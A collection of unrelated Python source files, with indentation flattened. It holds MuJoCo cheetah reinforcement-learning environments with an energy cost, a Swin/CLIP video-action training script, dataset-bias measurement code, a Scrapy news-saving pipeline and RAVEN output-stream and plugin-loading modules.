class HalfCheetahEnv(mujoco_env.MujocoEnv, utils.EzPickle):
def __init__(self,
xml_file='half_cheetah.xml',
forward_reward_weight=1.0,
ctrl_cost_weight=0.1,
reset_noise_scale=0.1,
exclude_current_positions_from_observation=True,
energy_weights=0.):
utils.EzPickle.__init__(**locals())
self._forward_reward_weight = forward_reward_weight
self.joint_list=['bthigh','bshin','bfoot','fthigh','fshin','ffoot']
self._ctrl_cost_weight = ctrl_cost_weight
self.energy_weights=energy_weights
self._reset_noise_scale = reset_noise_scale
self._exclude_current_positions_from_observation = (
exclude_current_positions_from_observation)
global path
mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), 5)
#mujoco_env.MujocoEnv.__init__(self, xml_file, 5)
def control_cost(self, action):
control_cost = self._ctrl_cost_weight * np.sum(np.square(action))
return control_cost
def step(self, action):
states_angle = []
for j in self.joint_list:
states_angle.append(self.sim.data.get_joint_qpos(j))
#states=self._get_obs()
x_position_before = self.sim.data.qpos[0]
self.do_simulation(action, self.frame_skip)
x_position_after = self.sim.data.qpos[0]
x_velocity = ((x_position_after - x_position_before)
/ self.dt)
ctrl_cost = self.control_cost(action)
forward_reward = self._forward_reward_weight * x_velocity
observation = self._get_obs()
#next_states=observation
next_states_angle = []
for j in self.joint_list:
next_states_angle.append(self.sim.data.get_joint_qpos(j))
reward = forward_reward - ctrl_cost
done = False
energy = 0
for i in range(6):
delta_theta = np.abs(next_states_angle[i] - states_angle[i])
energy = energy + np.abs(action[i]) * delta_theta
'''delta_theta_bt = np.abs(next_states[2] - states[2])
delta_theta_bs = np.abs(next_states[3] - states[3])
delta_theta_bf = np.abs(next_states[4] - states[4])
delta_theta_ft = np.abs(next_states[5] - states[5])
delta_theta_fs = np.abs(next_states[6] - states[6])
delta_theta_ff = np.abs(next_states[7] - states[7])
energy_bt = np.abs(action[0]) * delta_theta_bt
energy_bs = np.abs(action[1]) * delta_theta_bs
energy_bf = np.abs(action[2]) * delta_theta_bf
energy_ft = np.abs(action[3]) * delta_theta_ft
energy_fs = np.abs(action[4]) * delta_theta_fs
energy_ff = np.abs(action[5]) * delta_theta_ff
energy = energy_bt + energy_bs + energy_bf + energy_ft + energy_fs + energy_ff'''
reward -= self.energy_weights*energy
info = {
'x_position': x_position_after,
'x_velocity': x_velocity,
'energy' : energy,
'reward_run': forward_reward,
'reward_ctrl': -ctrl_cost,
'ori_reward':forward_reward-ctrl_cost
}
return observation, reward, done, info
def _get_obs(self):
position = self.sim.data.qpos.flat.copy()
velocity = self.sim.data.qvel.flat.copy()
if self._exclude_current_positions_from_observation:
position = position[1:]
observation = np.concatenate((position, velocity)).ravel()
return observation
def reset_model(self):
noise_low = -self._reset_noise_scale
noise_high = self._reset_noise_scale
qpos = self.init_qpos + self.np_random.uniform(
low=noise_low, high=noise_high, size=self.model.nq)
qvel = self.init_qvel + self._reset_noise_scale * self.np_random.randn(
self.model.nv)
self.set_state(qpos, qvel)
observation = self._get_obs()
return observation
def viewer_setup(self):
for key, value in DEFAULT_CAMERA_CONFIG.items():
if isinstance(value, np.ndarray):
getattr(self.viewer.cam, key)[:] = value
else:
setattr(self.viewer.cam, key, value)
class HalfCheetahHeavyEnv(mujoco_env.MujocoEnv, utils.EzPickle):
def __init__(self,
xml_file='half_cheetah_heavy.xml',
forward_reward_weight=1.0,
ctrl_cost_weight=0.1,
reset_noise_scale=0.1,
exclude_current_positions_from_observation=True,
energy_weights=0.):
utils.EzPickle.__init__(**locals())
self._forward_reward_weight = forward_reward_weight
self.joint_list=['bthigh','bshin','bfoot','fthigh','fshin','ffoot']
self._ctrl_cost_weight = ctrl_cost_weight
self.energy_weights=energy_weights
self._reset_noise_scale = reset_noise_scale
self._exclude_current_positions_from_observation = (
exclude_current_positions_from_observation)
global path
mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), 5)
#mujoco_env.MujocoEnv.__init__(self, xml_file, 5)
def control_cost(self, action):
control_cost = self._ctrl_cost_weight * np.sum(np.square(action))
return control_cost
def step(self, action):
states_angle = []
for j in self.joint_list:
states_angle.append(self.sim.data.get_joint_qpos(j))
#states=self._get_obs()
x_position_before = self.sim.data.qpos[0]
self.do_simulation(action, self.frame_skip)
x_position_after = self.sim.data.qpos[0]
x_velocity = ((x_position_after - x_position_before)
/ self.dt)
ctrl_cost = self.control_cost(action)
forward_reward = self._forward_reward_weight * x_velocity
observation = self._get_obs()
#next_states=observation
next_states_angle = []
for j in self.joint_list:
next_states_angle.append(self.sim.data.get_joint_qpos(j))
reward = forward_reward - ctrl_cost
done = False
energy = 0
for i in range(6):
delta_theta = np.abs(next_states_angle[i] - states_angle[i])
energy = energy + np.abs(action[i]) * delta_theta
'''delta_theta_bt = np.abs(next_states[2] - states[2])
delta_theta_bs = np.abs(next_states[3] - states[3])
delta_theta_bf = np.abs(next_states[4] - states[4])
delta_theta_ft = np.abs(next_states[5] - states[5])
delta_theta_fs = np.abs(next_states[6] - states[6])
delta_theta_ff = np.abs(next_states[7] - states[7])
energy_bt = np.abs(action[0]) * delta_theta_bt
energy_bs = np.abs(action[1]) * delta_theta_bs
energy_bf = np.abs(action[2]) * delta_theta_bf
energy_ft = np.abs(action[3]) * delta_theta_ft
energy_fs = np.abs(action[4]) * delta_theta_fs
energy_ff = np.abs(action[5]) * delta_theta_ff
energy = energy_bt + energy_bs + energy_bf + energy_ft + energy_fs + energy_ff'''
reward -= self.energy_weights*energy
info = {
'x_position': x_position_after,
'x_velocity': x_velocity,
'energy' : energy,
'reward_run': forward_reward,
'reward_ctrl': -ctrl_cost,
'ori_reward':forward_reward-ctrl_cost
}
return observation, reward, done, info
def _get_obs(self):
position = self.sim.data.qpos.flat.copy()
velocity = self.sim.data.qvel.flat.copy()
if self._exclude_current_positions_from_observation:
position = position[1:]
observation = np.concatenate((position, velocity)).ravel()
return observation
def reset_model(self):
noise_low = -self._reset_noise_scale
noise_high = self._reset_noise_scale
qpos = self.init_qpos + self.np_random.uniform(
low=noise_low, high=noise_high, size=self.model.nq)
qvel = self.init_qvel + self._reset_noise_scale * self.np_random.randn(
self.model.nv)
self.set_state(qpos, qvel)
observation = self._get_obs()
return observation
def viewer_setup(self):
for key, value in DEFAULT_CAMERA_CONFIG.items():
if isinstance(value, np.ndarray):
getattr(self.viewer.cam, key)[:] = value
else:
setattr(self.viewer.cam, key, value)
class FullCheetahEnv(mujoco_env.MujocoEnv, utils.EzPickle):
def __init__(self,
xml_file='full_cheetah.xml',
forward_reward_weight=1.0,
ctrl_cost_weight=0.1,
reset_noise_scale=0.1,
exclude_current_positions_from_observation=True,
energy_weights=0.):
utils.EzPickle.__init__(**locals())
self._forward_reward_weight = forward_reward_weight
self.joint_list=['bthighL','bshinL','bfootL','fthighL','fshinL','ffootL',
'bthighR', 'bshinR', 'bfootR', 'fthighR', 'fshinR', 'ffootR']
self._ctrl_cost_weight = ctrl_cost_weight
self.energy_weights=energy_weights
self._reset_noise_scale = reset_noise_scale
self._exclude_current_positions_from_observation = (
exclude_current_positions_from_observation)
global path
mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), 5)
def control_cost(self, action):
control_cost = self._ctrl_cost_weight * np.sum(np.square(action))
return control_cost
def step(self, action):
states_angle = []
for j in self.joint_list:
states_angle.append(self.sim.data.get_joint_qpos(j))
#states=self._get_obs()
x_position_before = self.sim.data.qpos[0]
self.do_simulation(action, self.frame_skip)
x_position_after = self.sim.data.qpos[0]
x_velocity = ((x_position_after - x_position_before)
/ self.dt)
ctrl_cost = self.control_cost(action)
forward_reward = self._forward_reward_weight * x_velocity
observation = self._get_obs()
#next_states=observation
next_states_angle = []
for j in self.joint_list:
next_states_angle.append(self.sim.data.get_joint_qpos(j))
reward = forward_reward - ctrl_cost
done = False
energy = 0
for i in range(len(self.joint_list)):
delta_theta = np.abs(next_states_angle[i] - states_angle[i])
energy = energy + np.abs(action[i]) * delta_theta
'''delta_theta_bt = np.abs(next_states[2] - states[2])
delta_theta_bs = np.abs(next_states[3] - states[3])
delta_theta_bf = np.abs(next_states[4] - states[4])
delta_theta_ft = np.abs(next_states[5] - states[5])
delta_theta_fs = np.abs(next_states[6] - states[6])
delta_theta_ff = np.abs(next_states[7] - states[7])
energy_bt = np.abs(action[0]) * delta_theta_bt
energy_bs = np.abs(action[1]) * delta_theta_bs
energy_bf = np.abs(action[2]) * delta_theta_bf
energy_ft = np.abs(action[3]) * delta_theta_ft
energy_fs = np.abs(action[4]) * delta_theta_fs
energy_ff = np.abs(action[5]) * delta_theta_ff
energy = energy_bt + energy_bs + energy_bf + energy_ft + energy_fs + energy_ff'''
reward -= self.energy_weights*energy
info = {
'x_position': x_position_after,
'x_velocity': x_velocity,
'energy' : energy,
'reward_run': forward_reward,
'reward_ctrl': -ctrl_cost,
'ori_reward':forward_reward-ctrl_cost
}
return observation, reward, done, info
def _get_obs(self):
position = self.sim.data.qpos.flat.copy()
velocity = self.sim.data.qvel.flat.copy()
if self._exclude_current_positions_from_observation:
position = position[1:]
observation = np.concatenate((position, velocity)).ravel()
return observation
def reset_model(self):
noise_low = -self._reset_noise_scale
noise_high = self._reset_noise_scale
qpos = self.init_qpos + self.np_random.uniform(
low=noise_low, high=noise_high, size=self.model.nq)
qvel = self.init_qvel + self._reset_noise_scale * self.np_random.randn(
self.model.nv)
self.set_state(qpos, qvel)
observation = self._get_obs()
return observation
def viewer_setup(self):
for key, value in DEFAULT_CAMERA_CONFIG.items():
if isinstance(value, np.ndarray):
getattr(self.viewer.cam, key)[:] = value
else:
setattr(self.viewer.cam, key, value)
```
#### File: softlearning/models/feedforward.py
```python
import tensorflow as tf
import tensorflow_probability as tfp
tfd = tfp.distributions
from softlearning.utils.keras import PicklableKerasModel
SCALE_DIAG_MIN_MAX = (-20, 2)
def sampling(args):
z_log_var = args
batch = tf.keras.backend.shape(z_log_var)[0]
dim = tf.keras.backend.int_shape(z_log_var)[1]
# by default, random_normal has mean=0 and std=1.0
epsilon = tf.keras.backend.random_normal(shape=(batch, dim))
return tf.keras.backend.exp(0.5 * z_log_var) * epsilon
def feedforward_model(input_shapes,
output_size,
hidden_layer_sizes,
activation='relu',
output_activation='linear',
preprocessors=None,
name='feedforward_model',
*args,
**kwargs):
inputs = [
tf.keras.layers.Input(shape=input_shape)
for input_shape in input_shapes
]
if preprocessors is None:
preprocessors = (None, ) * len(inputs)
preprocessed_inputs = [
preprocessor(input_) if preprocessor is not None else input_
for preprocessor, input_ in zip(preprocessors, inputs)
]
concatenated = tf.keras.layers.Lambda(
lambda x: tf.concat(x, axis=-1)
)(preprocessed_inputs)
out = concatenated
for units in hidden_layer_sizes:
out = tf.keras.layers.Dense(
units, *args, activation=activation, **kwargs
)(out)
out = tf.keras.layers.Dense(
output_size, *args, activation=output_activation, **kwargs
)(out)
model = PicklableKerasModel(inputs, out, name=name)
return model
``` |
{
"source": "jiazheng-xing/Swin_Multimodal",
"score": 2
} |
#### File: jiazheng-xing/Swin_Multimodal/train_swin.py
```python
import os
from torch._C import import_ir_module
import torch.nn as nn
from datasets import Action_DATASETS
from torch.utils.data import DataLoader
from tqdm import tqdm
import wandb
import argparse
import shutil
from pathlib import Path
import yaml
from dotmap import DotMap
import pprint
from modules.Visual_Prompt_OR import visual_prompt
from utils.KLLoss import KLLoss
from test_swin import validate
from utils.Augmentation import *
from utils.solver_swin import _optimizer, _lr_scheduler
from utils.tools import *
from utils.Text_Prompt import *
from utils.saving import *
from swin.swin_transf import SwinTransformer3D
from swin.pretrain_load import inflate_weights
class TextCLIP(nn.Module):
def __init__(self, model) :
super(TextCLIP, self).__init__()
self.model = model
def forward(self,text):
return self.model.encode_text(text)
class ImageCLIP(nn.Module):
def __init__(self, model) :
super(ImageCLIP, self).__init__()
self.model = model
def forward(self,image):
return self.model.encode_image(image)
def main():
global args, best_prec1
global global_step
parser = argparse.ArgumentParser()
parser.add_argument('--config', '-cfg', default='')
parser.add_argument('--log_time', default='')
args = parser.parse_args()
with open(args.config, 'r') as f:
config = yaml.load(f, Loader=yaml.FullLoader )
working_dir = os.path.join('./exp', config['network']['type'], config['network']['arch'], config['data']['dataset'], args.log_time)
wandb.init(project=config['network']['type'],name='{}_{}_{}_{}'.format(args.log_time,config['network']['type'], config['network']['arch'], config['data']['dataset']))
print('-' * 80)
print(' ' * 20, "working dir: {}".format(working_dir))
print('-' * 80)
print('-' * 80)
print(' ' * 30, "Config")
pp = pprint.PrettyPrinter(indent=4)
pp.pprint(config)
print('-' * 80)
config = DotMap(config)
Path(working_dir).mkdir(parents=True, exist_ok=True)
shutil.copy(args.config, working_dir)
shutil.copy('train.py', working_dir)
device = "cuda" if torch.cuda.is_available() else "cpu" # If using GPU then use mixed precision training.
model, clip_state_dict = clip.load(config.network.arch,device=device,jit=False, tsm=config.network.tsm, T=config.data.num_segments,dropout=config.network.drop_out, emb_dropout=config.network.emb_dropout,pretrain=config.network.init, joint = config.network.joint) #Must set jit=False for training ViT-B/32
swin_model = SwinTransformer3D(patch_size = tuple(config.swin_model.patch_size), drop_path_rate = config.swin_model.drop_path_rate, in_channels = config.swin_model.in_channels, depths = tuple(config.swin_model.depths), embed_dim =config.swin_model.embed_dim, num_heads= tuple(config.swin_model.num_heads))
# swin_model = SwinTransformer3D()
transform_train = get_augmentation(True,config)
transform_val = get_augmentation(False,config)
if config.data.randaug.N > 0:
transform_train = randAugment(transform_train, config)
print('train transforms: {}'.format(transform_train.transforms))
print('val transforms: {}'.format(transform_val.transforms))
model_text = TextCLIP(model)
model_image = ImageCLIP(model)
swin_model = torch.nn.DataParallel(swin_model).cuda()
model_text = torch.nn.DataParallel(model_text).cuda()
model_image = torch.nn.DataParallel(model_image).cuda()
wandb.watch(swin_model)
wandb.watch(model)
train_data = Action_DATASETS(config.data.train_list,config.data.label_list,num_segments=config.data.num_segments,image_tmpl=config.data.image_tmpl,random_shift=config.random_shift,
transform=transform_train)
train_loader = DataLoader(train_data,batch_size=config.data.batch_size,num_workers=config.data.workers,shuffle=True,pin_memory=False,drop_last=True)
val_data = Action_DATASETS(config.data.val_list,config.data.label_list, random_shift=config.data.random_shift,num_segments=config.data.num_segments,image_tmpl=config.data.image_tmpl,
transform=transform_val)
val_loader = DataLoader(val_data,batch_size=config.data.batch_size,num_workers=config.data.workers,shuffle=False,pin_memory=False,drop_last=True)
# if device == "cpu":
model_text.float()
model_image.float()
swin_model.float()
# else :
# clip.model.convert_weights(model_text) # Actually this line is unnecessary since clip by default already on float16
# clip.model.convert_weights(model_image)
# clip.model.convert_weights(swin_model)
loss_img = KLLoss()
loss_txt = KLLoss()
start_epoch = config.solver.start_epoch
if config.pretrain:
if os.path.isfile(config.pretrain):
print(("=> loading checkpoint '{}'".format(config.pretrain)))
checkpoint = torch.load(config.pretrain)
model.load_state_dict(checkpoint['model_state_dict'])
del checkpoint
else:
print(("=> no checkpoint found at '{}'".format(config.resume)))
if config.swin_model.pretrain:
if config.swin_model.pretrain_type == '2D_pretrain':
pretrained_state_dict = inflate_weights(config.swin_model.pretrain,swin_model.module, tuple(config.swin_model.window_size), tuple(config.swin_model.patch_size))
swin_model.module.load_state_dict(pretrained_state_dict, strict=False)
del pretrained_state_dict
else:
unexpected_keys = ['cls_head.fc_cls.weight', 'cls_head.fc_cls.bias']
pretrained_state_dict = torch.load(config.swin_model.pretrain, map_location='cpu')
pretrained_state_dict = {k: v for k, v in pretrained_state_dict['state_dict'].items() if k not in unexpected_keys} # train的时候需要
pretrained_state_dict = {k[9:]: v for k, v in pretrained_state_dict.items()}
swin_model.module.load_state_dict(pretrained_state_dict, strict=False)
del pretrained_state_dict
print("---------------------------------------------------swin_model_load_succes----------------------------------------------")
# print("fix_text_parameters")
if config.resume:
if os.path.isfile(config.resume):
print(("=> loading checkpoint '{}'".format(config.resume)))
checkpoint = torch.load(config.resume)
model.load_state_dict(checkpoint['model_state_dict'])
swin_model.load_state_dict(checkpoint['swin_model'])
start_epoch = checkpoint['epoch']
print(("=> loaded checkpoint '{}' (epoch {})"
.format(config.resume, start_epoch)))
del checkpoint
else:
print(("=> no checkpoint found at '{}'".format(config.pretrain)))
classes, num_text_aug, text_dict = text_prompt(train_data)
optimizer = _optimizer(config, model, swin_model)
lr_scheduler = _lr_scheduler(config, optimizer)
best_prec1 = 0.0
if config.solver.evaluate:
prec1 = validate(start_epoch,val_loader, classes, device, model, config,num_text_aug, swin_model)
return
# for k,v in model.named_parameters():
# print('{}: {}'.format(k, v.requires_grad)) #text_encoder weight fixed
for epoch in range(start_epoch, config.solver.epochs):
model_image.train()
model_text.train()
swin_model.train()
for kkk,(images,list_id) in enumerate(tqdm(train_loader)):
if config.solver.type != 'monitor':
if (kkk+1) == 1 or (kkk+1) % 10 == 0:
lr_scheduler.step(epoch + kkk / len(train_loader))
optimizer.zero_grad()
images = images.view((-1,config.data.num_segments,3)+images.size()[-2:])
b,t,c,h,w = images.size()
text_id = numpy.random.randint(num_text_aug,size=len(list_id))
texts = torch.stack([text_dict[j][i,:] for i,j in zip(list_id,text_id)])
# images= images.to(device).view(-1,c,h,w ) # omit the Image.fromarray if the images already in PIL format, change this line to images=list_image if using preprocess inside the dataset class
texts = texts.to(device)
images = images.to(device).permute(0,2,1,3,4)
# image_embedding = model_image(images)
image_embedding = swin_model(images)
text_embedding = model_text(texts)
# print("*"*100)
# print("text_embedding:{}".format(text_embedding.shape))
# print("*"*100)
if config.network.fix_text:
text_embedding.detach_()
logit_scale = model.logit_scale.exp()
logits_per_image, logits_per_text = create_logits(image_embedding,text_embedding,logit_scale)
ground_truth = torch.tensor(gen_label(list_id),dtype=image_embedding.dtype,device=device)
loss_imgs = loss_img(logits_per_image,ground_truth)
loss_texts = loss_txt(logits_per_text,ground_truth)
total_loss = (loss_imgs + loss_texts)/2
wandb.log({"train_total_loss": total_loss})
wandb.log({"train_loss_imgs": loss_imgs})
wandb.log({"train_loss_texts": loss_texts})
total_loss.backward()
optimizer.step()
# if device == "cpu":
# optimizer.step()
# else:
# convert_models_to_fp32(model)
# convert_models_to_fp32(swin_model)
# optimizer.step()
# clip.model.convert_weights(model)
# clip.model.convert_weights(swin_model)
if epoch % config.logging.eval_freq == 0: # and epoch>0
prec1 = validate(epoch,val_loader, classes, device, model,swin_model, config,num_text_aug)
is_best = prec1 > best_prec1
best_prec1 = max(prec1, best_prec1)
print('Testing: {}/{}'.format(prec1,best_prec1))
print('Saving:')
filename = "{}/last_model.pt".format(working_dir)
epoch_saving(epoch, model, swin_model, optimizer, filename)
if is_best:
best_saving(working_dir, epoch, model, swin_model, optimizer)
if __name__ == '__main__':
main()
``` |
{
"source": "jiazhi412/Dataset-REPAIR",
"score": 2
} |
#### File: Dataset-REPAIR/utils/measure.py
```python
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from tqdm import tqdm
def train(loader, epochs, model, optimizer, scheduler=None):
model.train()
with tqdm(range(1, epochs + 1)) as pbar:
for _ in pbar:
losses = []
corrects = 0
if scheduler is not None:
scheduler.step()
for x, y in loader:
out = model(x)
loss = F.cross_entropy(out, y)
losses.append(loss.item())
corrects += out.max(1)[1].eq(y).sum().item()
optimizer.zero_grad()
loss.backward()
optimizer.step()
loss = sum(losses) / len(losses)
acc = 100 * corrects / len(loader.dataset)
pbar.set_postfix(loss='%.3f' % loss, acc='%.2f%%' % acc)
return loss, acc
def measure_bias(train_loader, test_loader, feat_fn, feat_dim, opt, verbose=True):
epochs = opt['epochs']
lr = opt['lr']
device = opt['device']
# class counts
train_labels = torch.tensor([data[1] for data in train_loader.dataset]).long().to(device)
n_cls = int(train_labels.max()) + 1
# create models
model = nn.Linear(feat_dim, n_cls).to(device)
optimizer = optim.Adam(model.parameters(), lr=lr)
scheduler = optim.lr_scheduler.StepLR(optimizer, 15, 0.1)
# training
model.train()
pbar = tqdm(range(1, epochs + 1)) if verbose else range(1, epochs + 1)
for _ in pbar:
losses = []
corrects = 0
scheduler.step()
for x, y in train_loader:
x, y = x.to(device), y.to(device)
# linear classifier
color = feat_fn(x)
out = model(color)
loss = F.cross_entropy(out, y)
losses.append(loss.item())
corrects += out.max(1)[1].eq(y).sum().item()
optimizer.zero_grad()
loss.backward()
optimizer.step()
loss = sum(losses) / len(losses)
acc = 100 * corrects / len(train_loader.dataset)
if verbose:
pbar.set_postfix(loss='%.3f' % loss, acc='%.2f%%' % acc)
# testing
model.eval()
with torch.no_grad():
losses = []
corrects = 0
for x, y in test_loader:
x, y = x.to(device), y.to(device)
x = x.view(x.size(0), x.size(1), -1)
out = model(feat_fn(x))
loss = F.cross_entropy(out, y)
losses.append(loss.item())
corrects += out.max(1)[1].eq(y).sum().item()
loss = sum(losses) / len(losses)
acc = 100 * corrects / len(test_loader.dataset)
# measure bias
cls_count = torch.stack([train_labels == c for c in range(n_cls)]).sum(1).float()
cls_w = cls_count[cls_count > 0] / cls_count.sum()
entropy = -(cls_w * cls_w.log()).sum().item()
bias = 1 - loss / entropy
return bias, loss, acc, entropy
def measure_generalization(train_loader, test_loaders, model, opt):
epochs = opt['epochs']
lr = opt['lr']
device = opt['device']
# create models
model = model.to(device)
optimizer = optim.Adam(model.parameters(), lr=lr)
scheduler = optim.lr_scheduler.StepLR(optimizer, 20, 0.1)
# training
train(train_loader, epochs, model, optimizer, scheduler)
# testing
model.eval()
test_losses = []
test_accs = []
with torch.no_grad():
for k, loader in enumerate(test_loaders):
losses = []
corrects = 0
for x, y in loader:
x, y = x.to(device), y.to(device)
out = model(x)
loss = F.cross_entropy(out, y)
losses.append(loss.item())
corrects += out.max(1)[1].eq(y).sum().item()
loss = sum(losses) / len(losses)
test_losses.append(loss)
acc = corrects / len(loader.dataset)
test_accs.append(acc)
return test_accs
``` |
{
"source": "jia-zh/News-Spider",
"score": 3
} |
#### File: News-Spider/NewsSpider/pipelines.py
```python
import os
import re
class NewsspiderPipeline(object):
def __init__(self):
root_path = '/'.join(os.path.abspath(__file__).split('/')[:-2])
self.news_path = os.path.join(root_path, 'news')
if not os.path.exists(self.news_path):
os.makedirs(self.news_path)
self.rep = {'<':'', '>':'', '/':'', '\\':'', '|':'', ':':'', '"':'', '*':'', '?':'', ' ':'', '-':'', '\n':'','\r':''}
self.rep = dict((re.escape(k), v) for k, v in self.rep.items())
self.pattern = re.compile("|".join(self.rep.keys()))
'''处理数据流'''
def process_item(self, item, spider):
keyword = item['keyword']
event_path = os.path.join(self.news_path, keyword)
if not os.path.exists(event_path):
os.makedirs(event_path)
filename = os.path.join(event_path,
self.pattern.sub(lambda m: self.rep[re.escape(m.group(0))], item['news_time'])[0:12] + '@' +
self.pattern.sub(lambda m: self.rep[re.escape(m.group(0))], item['news_title']))
if len(filename) > 200:
filename = filename[0:200] + "..."
with open(filename, "w", encoding="utf-8") as f:
f.write("标题:{0}\n".format(item['news_title']))
f.write("URL:{0}\n".format(item['news_url']))
f.write("发布时间:{0}\n".format(item['news_time']))
f.write("正文:{0}\n".format(item['news_content']))
f.close()
``` |
{
"source": "JiaZhou-PU/raven",
"score": 2
} |
#### File: framework/OutStreams/FilePrint.py
```python
import os
from utils import InputData, InputTypes
import DataObjects
from .OutStreamBase import OutStreamBase
from ClassProperty import ClassProperty
class FilePrint(OutStreamBase):
"""
Class for managing the printing of files as an output stream.
"""
## Promoting these to static class variables, since they will not alter from
## object to object. The use of the @ClassProperty with only a getter makes
## the variables immutable (so long as no one touches the internally stored
## "_"-prefixed), so other objects don't accidentally modify them.
_availableOutStreamTypes = ['csv', 'xml']
@ClassProperty
def availableOutStreamTypes(cls):
"""
A class level constant that tells developers what outstreams are
available from this class
@ In, cls, the OutStreams class of which this object will be a type
"""
return cls._availableOutStreamTypes
@classmethod
def getInputSpecification(cls):
"""
Method to get a reference to a class that specifies the input data for class "cls".
@ In, cls, the class for which we are retrieving the specification
@ Out, inputSpecification, InputData.ParameterInput, class to use for specifying the input of cls.
"""
spec = OutStreamBase.getInputSpecification()
types = InputTypes.makeEnumType('FilePrintTypes', 'FilePrintTypes', cls._availableOutStreamTypes)
spec.addSub(InputData.parameterInputFactory('type', contentType=types))
spec.addSub(InputData.parameterInputFactory('source', contentType=InputTypes.StringListType))
spec.addSub(InputData.parameterInputFactory('what', contentType=InputTypes.StringListType))
spec.addSub(InputData.parameterInputFactory('filename', contentType=InputTypes.StringType))
spec.addSub(InputData.parameterInputFactory('clusterLabel', contentType=InputTypes.StringType))
# these are in user manual or code, but don't appear to be used/documented ...
# spec.addSub(InputData.parameterInputFactory('target', contentType=InputTypes.StringListType))
# spec.addSub(InputData.parameterInputFactory('directory',
# contentType=InputTypes.StringListType))
return spec
def __init__(self):
"""
Constructor
@ In, None
@ Out, None
"""
OutStreamBase.__init__(self)
self.type = 'OutStreamFilePrint'
self.printTag = 'OUTSTREAM PRINT'
self.sourceName = []
self.sourceData = None
self.what = None
# dictionary of what indices have already been printed, so we don't duplicate writing efforts
self.indexPrinted = {} # keys are filenames, which should be reset at the end of every step
self.subDirectory = None # subdirectory where to store the outputs
def _handleInput(self, spec):
"""
Loads the input specs for this object.
@ In, spec, InputData.ParameterInput, input specifications
@ Out, None
"""
typ = spec.findFirst('type')
if typ is None:
self.raiseAnError(IOError, f'OutStream.Print "{self.name}" is missing the "type" node!')
self.options['type'] = typ.value
source = spec.findFirst('source')
if source is None:
self.raiseAnError(IOError, f'OutStream.Print "{self.name}" is missing the "source" node!')
self.sourceName = source.value
# FIXME this is a terrible name
what = spec.findFirst('what')
if what is not None:
self.what = what.value # [x.lower() for x in what.value]
fname = spec.findFirst('filename')
if fname is not None:
self.filename = fname.value
cluster = spec.findFirst('clusterLabel')
if cluster is not None:
self.options['clusterLabel'] = cluster.value
# checks
if self.options['type'] == 'csv' and self.what is not None:
for target in [x.lower() for x in self.what]:
if not target.startswith(('input', 'output', 'metadata')):
self.raiseAnError(IOError, f'<what> requests must start with "input", "output", or "metadata"! See OutStream.Print "{self.name}"')
def localGetInitParams(self):
"""
This method is called from the base function. It retrieves the initial
characteristic params that need to be seen by the whole enviroment
@ In, None
@ Out, paramDict, dict, dictionary containing the parameter names as keys
and each parameter's initial value as the dictionary values
"""
paramDict = {}
for index in range(len(self.sourceName)):
paramDict['Source Name ' + str(index) + ' :'] = self.sourceName[index]
if self.what:
for index, var in enumerate(self.what):
paramDict['Variable Name ' + str(index) + ' :'] = var
return paramDict
def initialize(self, inDict):
"""
Function to initialize the OutStream. It basically looks for the "data"
object and links it to the system
@ In, inDict, dict, It contains all the Object are going to be used in the
current step. The sources are searched into this.
@ Out, None
"""
# the linking to the source is performed in the base class initialize method
OutStreamBase.initialize(self, inDict)
def addOutput(self):
"""
Calls output functions on desired instances in order to print out the
linked dataObjects
@ In, None
@ Out, None
"""
dictOptions = {}
dictOptions['filenameroot'] = self.name
if len(self.filename) > 0:
dictOptions['filenameroot'] = self.filename
if self.subDirectory is not None:
dictOptions['filenameroot'] = os.path.join(self.subDirectory,dictOptions['filenameroot'])
if self.what:
dictOptions['what'] = self.what
if 'target' in self.options.keys():
dictOptions['target'] = self.options['target']
for index in range(len(self.sourceName)):
try:
empty = self.sourceData[index].isEmpty
except AttributeError:
empty = False
if self.options['type'] == 'csv':
filename = dictOptions['filenameroot']
rlzIndex = self.indexPrinted.get(filename,0)
dictOptions['firstIndex'] = rlzIndex
# clusterLabel lets the user print a point set as if it were a history, with input decided by clusterLabel
if 'clusterLabel' in self.options:
if type(self.sourceData[index]).__name__ != 'PointSet':
self.raiseAWarning('Label clustering currently only works for PointSet data objects! Skipping for',self.sourceData[index].name)
else:
dictOptions['clusterLabel'] = self.options['clusterLabel']
try:
rlzIndex = self.sourceData[index].write(filename,style='CSV',**dictOptions)
except AttributeError:
self.raiseAnError(NotImplementedError, 'No implementation for source type', self.sourceData[index].type, 'and output type "'+str(self.options['type'].strip())+'"!')
finally:
self.indexPrinted[filename] = rlzIndex
elif self.options['type'] == 'xml':
try:
self.sourceData[index].printXML(dictOptions)
except AttributeError:
self.raiseAnError(NotImplementedError, 'No implementation for source type', self.sourceData[index].type, 'and output type "'+str(self.options['type'].strip())+'"!')
def finalize(self):
"""
End-of-step operations for cleanup.
@ In, None
@ Out, None
"""
# clear history of printed realizations; start fresh for next step
self.indexPrinted = {}
```
#### File: raven/framework/PostProcessorInterfaces.py
```python
from __future__ import division, print_function, unicode_literals, absolute_import
from __future__ import division, print_function, unicode_literals, absolute_import
#End compatibility block for Python 3----------------------------------------------------------------
#External Modules------------------------------------------------------------------------------------
import os
from glob import glob
import inspect
#External Modules End--------------------------------------------------------------------------------
#Internal Modules------------------------------------------------------------------------------------
from utils import utils
#Internal Modules End--------------------------------------------------------------------------------
__moduleInterfaceList = []
startDir = os.path.join(os.path.dirname(__file__),'PostProcessorFunctions')
for dirr,_,_ in os.walk(startDir):
__moduleInterfaceList.extend(glob(os.path.join(dirr,"*.py")))
utils.add_path(dirr)
__moduleImportedList = []
'''
Interfaced Post Processor
Here all the Interfaced Post-Processors located in the raven/framework/PostProcessorFunctions folder are parsed and their instance is returned
'''
__base = 'PostProcessor'
__interFaceDict = {}
for moduleIndex in range(len(__moduleInterfaceList)):
if 'class' in open(__moduleInterfaceList[moduleIndex]).read():
__moduleImportedList.append(utils.importFromPath(__moduleInterfaceList[moduleIndex],False))
for key,modClass in inspect.getmembers(__moduleImportedList[-1], inspect.isclass):
# in this way we can get all the class methods
classMethods = [method for method in dir(modClass) if callable(getattr(modClass, method))]
if 'run' in classMethods:
__interFaceDict[key] = modClass
__knownTypes = list(__interFaceDict.keys())
def interfaceClasses():
"""
This returns the classes available
@ In, None
@ Out, interfaceClasses, list of classes available
"""
return list(__interFaceDict.values())
def knownTypes():
"""
This function returns the types of interfaced post-processors available
@ In, None,
@ Out, __knownTypes, list, list of recognized post-processors
"""
return __knownTypes
